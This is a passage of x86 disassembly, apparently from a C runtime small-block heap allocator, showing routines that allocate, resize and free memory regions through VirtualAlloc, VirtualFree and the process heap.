lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_42D078
loc_42D0B1: ; CODE XREF: sub_42D008+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_42D0EE
or [eax+4], edi
loc_42D0EE: ; CODE XREF: sub_42D008+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_42D0FE: ; CODE XREF: sub_42D008+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D008 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D103 proc near ; CODE XREF: sub_431C83+8F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_42D2B1
test bl, 1
jnz loc_42D2AA
add ebx, ecx
cmp esi, ebx
jg loc_42D2AA
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_42D17A
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_42D17A: ; CODE XREF: sub_42D103+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_42D1CA
cmp ecx, 20h
jnb short loc_42D1A6
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42D1CA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42D1CA
; ---------------------------------------------------------------------------
loc_42D1A6: ; CODE XREF: sub_42D103+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42D1CA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42D1CA: ; CODE XREF: sub_42D103+7D�j
; sub_42D103+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_42D298
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_42D204
push 3Fh
pop edi
loc_42D204: ; CODE XREF: sub_42D103+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_42D286
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_42D25D
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_42D250
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_42D250: ; CODE XREF: sub_42D103+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_42D282
; ---------------------------------------------------------------------------
loc_42D25D: ; CODE XREF: sub_42D103+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_42D273
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_42D273: ; CODE XREF: sub_42D103+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_42D282: ; CODE XREF: sub_42D103+158�j
shr edx, cl
or [eax], edx
loc_42D286: ; CODE XREF: sub_42D103+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_42D29B
; ---------------------------------------------------------------------------
loc_42D298: ; CODE XREF: sub_42D103+E5�j
mov edx, [ebp+arg_4]
loc_42D29B: ; CODE XREF: sub_42D103+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_42D3F1
; ---------------------------------------------------------------------------
loc_42D2AA: ; CODE XREF: sub_42D103+52�j
; sub_42D103+5C�j
xor eax, eax
jmp loc_42D3F4
; ---------------------------------------------------------------------------
loc_42D2B1: ; CODE XREF: sub_42D103+49�j
jge loc_42D3F1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_42D2DC
push 3Fh
pop esi
loc_42D2DC: ; CODE XREF: sub_42D103+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_42D36B
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_42D2F5
push 3Fh
pop esi
loc_42D2F5: ; CODE XREF: sub_42D103+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_42D344
cmp esi, 20h
jnb short loc_42D320
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_42D341
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42D341
; ---------------------------------------------------------------------------
loc_42D320: ; CODE XREF: sub_42D103+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42D341
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42D341: ; CODE XREF: sub_42D103+214�j
; sub_42D103+21B�j ...
mov ebx, [ebp+arg_4]
loc_42D344: ; CODE XREF: sub_42D103+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_42D36B
push 3Fh
pop esi
loc_42D36B: ; CODE XREF: sub_42D103+1DD�j
; sub_42D103+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_42D3E8
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_42D3BF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42D3B2
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_42D3B2: ; CODE XREF: sub_42D103+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_42D3E4
; ---------------------------------------------------------------------------
loc_42D3BF: ; CODE XREF: sub_42D103+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42D3D5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_42D3D5: ; CODE XREF: sub_42D103+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_42D3E4: ; CODE XREF: sub_42D103+2BA�j
shr edx, cl
or [eax], edx
loc_42D3E8: ; CODE XREF: sub_42D103+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_42D3F1: ; CODE XREF: sub_42D103+1A2�j
; sub_42D103:loc_42D2B1�j
push 1
pop eax
loc_42D3F4: ; CODE XREF: sub_42D103+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D103 endp
; =============== S U B R O U T I N E =======================================
sub_42D3F9 proc near ; CODE XREF: sub_42C855+41�p
; sub_42D6F1:loc_42D8C0�p
cmp dword_451160, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_42D40D
mov esi, offset off_451150
jmp short loc_42D42A
; ---------------------------------------------------------------------------
loc_42D40D: ; CODE XREF: sub_42D3F9+B�j
push 2020h
push 0
push dword_677000
call dword_437210 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_42D536
loc_42D42A: ; CODE XREF: sub_42D3F9+12�j
mov ebp, dword_437194
push 4
push 2000h
push 400000h
push 0
call ebp ; dword_437194
mov edi, eax
test edi, edi
jz loc_42D51F
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; dword_437194
test eax, eax
jz loc_42D511
mov eax, offset off_451150
cmp esi, eax
jnz short loc_42D489
cmp off_451150, 0
jnz short loc_42D479
mov off_451150, eax
loc_42D479: ; CODE XREF: sub_42D3F9+79�j
cmp off_451154, 0
jnz short loc_42D49E
mov off_451154, eax
jmp short loc_42D49E
; ---------------------------------------------------------------------------
loc_42D489: ; CODE XREF: sub_42D3F9+70�j
mov [esi], eax
mov eax, off_451154
mov [esi+4], eax
mov off_451154, esi
mov eax, [esi+4]
mov [eax], esi
loc_42D49E: ; CODE XREF: sub_42D3F9+87�j
; sub_42D3F9+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_42D4C0: ; CODE XREF: sub_42D3F9+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_42D4C0
push ebx
push 0
push edi
call sub_429760
add esp, 0Ch
loc_42D4E9: ; CODE XREF: sub_42D3F9+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_42D50D
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_42D4E9
; ---------------------------------------------------------------------------
loc_42D50D: ; CODE XREF: sub_42D3F9+F7�j
mov eax, esi
jmp short loc_42D538
; ---------------------------------------------------------------------------
loc_42D511: ; CODE XREF: sub_42D3F9+63�j
push 8000h
push 0
push edi
call dword_437198 ; VirtualFree
loc_42D51F: ; CODE XREF: sub_42D3F9+4B�j
cmp esi, offset off_451150
jz short loc_42D536
push esi
push 0
push dword_677000
call dword_437214 ; RtlFreeHeap
loc_42D536: ; CODE XREF: sub_42D3F9+2B�j
; sub_42D3F9+12C�j
xor eax, eax
loc_42D538: ; CODE XREF: sub_42D3F9+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_42D3F9 endp
; =============== S U B R O U T I N E =======================================
sub_42D53D proc near ; CODE XREF: sub_42D593+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_437198 ; VirtualFree
cmp off_453170, esi
jnz short loc_42D562
mov eax, [esi+4]
mov off_453170, eax
loc_42D562: ; CODE XREF: sub_42D53D+1B�j
cmp esi, offset off_451150
jz short loc_42D58A
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_677000
call dword_437214 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_42D58A: ; CODE XREF: sub_42D53D+2B�j
or dword_451160, 0FFFFFFFFh
pop esi
retn
sub_42D53D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D593 proc near ; CODE XREF: sub_42D6AC+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_451154
push edi
loc_42D5A0: ; CODE XREF: sub_42D593+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_42D63E
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_42D5B9: ; CODE XREF: sub_42D593+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_42D5FA
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call dword_437198 ; VirtualFree
test eax, eax
jz short loc_42D5FA
or dword ptr [edi], 0FFFFFFFFh
dec dword_676938
mov eax, [esi+0Ch]
test eax, eax
jz short loc_42D5EF
cmp eax, edi
jbe short loc_42D5F2
loc_42D5EF: ; CODE XREF: sub_42D593+56�j
mov [esi+0Ch], edi
loc_42D5F2: ; CODE XREF: sub_42D593+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_42D607
loc_42D5FA: ; CODE XREF: sub_42D593+2C�j
; sub_42D593+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_42D5B9
loc_42D607: ; CODE XREF: sub_42D593+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_42D63E
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_42D63E
push 1
lea eax, [ecx+20h]
pop edx
loc_42D61E: ; CODE XREF: sub_42D593+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_42D62F
inc edx
add eax, 8
cmp edx, 400h
jl short loc_42D61E
loc_42D62F: ; CODE XREF: sub_42D593+8E�j
cmp edx, 400h
jnz short loc_42D63E
push ecx
call sub_42D53D
pop ecx
loc_42D63E: ; CODE XREF: sub_42D593+11�j
; sub_42D593+7D�j ...
cmp esi, off_451154
jz short loc_42D650
cmp [ebp+arg_0], 0
jg loc_42D5A0
loc_42D650: ; CODE XREF: sub_42D593+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D593 endp
; =============== S U B R O U T I N E =======================================
sub_42D655 proc near ; CODE XREF: sub_4298F2+90�p
; sub_431C83+1D8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_451150
push esi
mov ecx, edx
loc_42D661: ; CODE XREF: sub_42D655+1C�j
cmp eax, [ecx+10h]
jbe short loc_42D66B
cmp eax, [ecx+14h]
jb short loc_42D673
loc_42D66B: ; CODE XREF: sub_42D655+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_42D6A8
jmp short loc_42D661
; ---------------------------------------------------------------------------
loc_42D673: ; CODE XREF: sub_42D655+14�j
test al, 0Fh
jnz short loc_42D6A8
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_42D6A8
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_42D6A8: ; CODE XREF: sub_42D655+1A�j
; sub_42D655+20�j ...
xor eax, eax
pop esi
retn
sub_42D655 endp
; =============== S U B R O U T I N E =======================================
sub_42D6AC proc near ; CODE XREF: sub_4298F2+A6�p
; sub_431C83+246�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_42D6F0
inc dword_676938
cmp dword_676938, 20h
jnz short locret_42D6F0
push 10h
call sub_42D593
pop ecx
locret_42D6F0: ; CODE XREF: sub_42D6AC+2B�j
; sub_42D6AC+3A�j
retn
sub_42D6AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D6F1 proc near ; CODE XREF: sub_4297F6+A7�p
; sub_42B39A+C4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_453170
push edi
loc_42D6FF: ; CODE XREF: sub_42D6F1+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_42D7AA
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_42D764
loc_42D72A: ; CODE XREF: sub_42D6F1+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_42D74D
cmp [edi+4], ebx
jbe short loc_42D74D
push ebx
push ecx
push eax
call sub_42D8F9
add esp, 0Ch
test eax, eax
jnz short loc_42D7BC
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_42D74D: ; CODE XREF: sub_42D6F1+40�j
; sub_42D6F1+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_42D72A
jmp short loc_42D767
; ---------------------------------------------------------------------------
loc_42D764: ; CODE XREF: sub_42D6F1+37�j
mov ebx, [ebp+arg_0]
loc_42D767: ; CODE XREF: sub_42D6F1+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_42D7AD
loc_42D77A: ; CODE XREF: sub_42D6F1+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_42D799
cmp [edi+4], ebx
jbe short loc_42D799
push ebx
push eax
push [ebp+var_4]
call sub_42D8F9
add esp, 0Ch
test eax, eax
jnz short loc_42D7BC
mov [edi+4], ebx
loc_42D799: ; CODE XREF: sub_42D6F1+8D�j
; sub_42D6F1+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_42D77A
jmp short loc_42D7AD
; ---------------------------------------------------------------------------
loc_42D7AA: ; CODE XREF: sub_42D6F1+14�j
mov ebx, [ebp+arg_0]
loc_42D7AD: ; CODE XREF: sub_42D6F1+87�j
; sub_42D6F1+B7�j
mov esi, [esi]
cmp esi, off_453170
jz short loc_42D7CC
jmp loc_42D6FF
; ---------------------------------------------------------------------------
loc_42D7BC: ; CODE XREF: sub_42D6F1+54�j
; sub_42D6F1+A3�j
mov off_453170, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_42D8F4
; ---------------------------------------------------------------------------
loc_42D7CC: ; CODE XREF: sub_42D6F1+C4�j
mov eax, offset off_451150
mov edi, eax
loc_42D7D3: ; CODE XREF: sub_42D6F1+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_42D7DF
cmp dword ptr [edi+0Ch], 0
jnz short loc_42D7EB
loc_42D7DF: ; CODE XREF: sub_42D6F1+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_42D8C0
jmp short loc_42D7D3
; ---------------------------------------------------------------------------
loc_42D7EB: ; CODE XREF: sub_42D6F1+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_42D81A
loc_42D809: ; CODE XREF: sub_42D6F1+127�j
cmp [ebp+var_4], 10h
jge short loc_42D81A
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_42D809
loc_42D81A: ; CODE XREF: sub_42D6F1+116�j
; sub_42D6F1+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_437194 ; VirtualAlloc
cmp eax, esi
jnz loc_42D8F2
push 0
push [ebp+var_8]
push esi
call sub_429760
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_42D881
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_42D857: ; CODE XREF: sub_42D6F1+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_42D857
loc_42D881: ; CODE XREF: sub_42D6F1+15E�j
mov off_453170, edi
lea eax, [edi+2018h]
loc_42D88D: ; CODE XREF: sub_42D6F1+1A8�j
cmp ecx, eax
jnb short loc_42D89D
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_42D89B
add ecx, 8
jmp short loc_42D88D
; ---------------------------------------------------------------------------
loc_42D89B: ; CODE XREF: sub_42D6F1+1A3�j
cmp ecx, eax
loc_42D89D: ; CODE XREF: sub_42D6F1+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_42D8F4
; ---------------------------------------------------------------------------
loc_42D8C0: ; CODE XREF: sub_42D6F1+F2�j
call sub_42D3F9
test eax, eax
jz short loc_42D8F2
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_453170, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_42D8F4
; ---------------------------------------------------------------------------
loc_42D8F2: ; CODE XREF: sub_42D6F1+143�j
; sub_42D6F1+1D6�j
xor eax, eax
loc_42D8F4: ; CODE XREF: sub_42D6F1+D6�j
; sub_42D6F1+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42D6F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D8F9 proc near ; CODE XREF: sub_42D6F1+4A�p
; sub_42D6F1+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_42D93E
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_42D92D
add [ecx], edx
sub [ecx+4], edx
jmp short loc_42D936
; ---------------------------------------------------------------------------
loc_42D92D: ; CODE XREF: sub_42D8F9+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42D936: ; CODE XREF: sub_42D8F9+32�j
lea eax, [edi+8]
jmp loc_42DA0C
; ---------------------------------------------------------------------------
loc_42D93E: ; CODE XREF: sub_42D8F9+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_42D947
mov eax, esi
loc_42D947: ; CODE XREF: sub_42D8F9+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_42D991
loc_42D94E: ; CODE XREF: sub_42D8F9+96�j
mov bl, [eax]
test bl, bl
jnz short loc_42D984
push 1
lea ebx, [eax+1]
pop esi
loc_42D95A: ; CODE XREF: sub_42D8F9+68�j
cmp byte ptr [ebx], 0
jnz short loc_42D963
inc ebx
inc esi
jmp short loc_42D95A
; ---------------------------------------------------------------------------
loc_42D963: ; CODE XREF: sub_42D8F9+64�j
cmp esi, edx
jnb short loc_42D9B5
cmp eax, [ebp+var_4]
jnz short loc_42D971
mov [ecx+4], esi
jmp short loc_42D97D
; ---------------------------------------------------------------------------
loc_42D971: ; CODE XREF: sub_42D8F9+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_42DA16
loc_42D97D: ; CODE XREF: sub_42D8F9+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_42D989
; ---------------------------------------------------------------------------
loc_42D984: ; CODE XREF: sub_42D8F9+59�j
movzx esi, bl
add eax, esi
loc_42D989: ; CODE XREF: sub_42D8F9+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_42D94E
loc_42D991: ; CODE XREF: sub_42D8F9+53�j
lea esi, [ecx+8]
loc_42D994: ; CODE XREF: sub_42D8F9+EB�j
; sub_42D8F9+F2�j
cmp esi, edi
jnb short loc_42DA16
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_42DA16
mov al, [esi]
test al, al
jnz short loc_42D9E6
push 1
lea ebx, [esi+1]
pop eax
loc_42D9AC: ; CODE XREF: sub_42D8F9+BA�j
cmp byte ptr [ebx], 0
jnz short loc_42D9D6
inc ebx
inc eax
jmp short loc_42D9AC
; ---------------------------------------------------------------------------
loc_42D9B5: ; CODE XREF: sub_42D8F9+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_42D9C6
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_42D9CF
; ---------------------------------------------------------------------------
loc_42D9C6: ; CODE XREF: sub_42D8F9+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_42D9CF: ; CODE XREF: sub_42D8F9+CB�j
mov [eax], dl
add eax, 8
jmp short loc_42DA0C
; ---------------------------------------------------------------------------
loc_42D9D6: ; CODE XREF: sub_42D8F9+B6�j
cmp eax, edx
jnb short loc_42D9ED
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_42DA16
mov esi, ebx
jmp short loc_42D994
; ---------------------------------------------------------------------------
loc_42D9E6: ; CODE XREF: sub_42D8F9+AB�j
movzx eax, al
add esi, eax
jmp short loc_42D994
; ---------------------------------------------------------------------------
loc_42D9ED: ; CODE XREF: sub_42D8F9+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_42D9FE
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_42DA07
; ---------------------------------------------------------------------------
loc_42D9FE: ; CODE XREF: sub_42D8F9+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42DA07: ; CODE XREF: sub_42D8F9+103�j
mov [esi], dl
lea eax, [esi+8]
loc_42DA0C: ; CODE XREF: sub_42D8F9+40�j
; sub_42D8F9+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_42DA18
; ---------------------------------------------------------------------------
loc_42DA16: ; CODE XREF: sub_42D8F9+7E�j
; sub_42D8F9+9D�j ...
xor eax, eax
loc_42DA18: ; CODE XREF: sub_42D8F9+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D8F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA1D proc near ; CODE XREF: sub_431C83+202�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_42DA57
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_42DAB7
; ---------------------------------------------------------------------------
loc_42DA57: ; CODE XREF: sub_42DA1D+26�j
jnb short loc_42DABE
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_42DABE
lea eax, [ecx+edx]
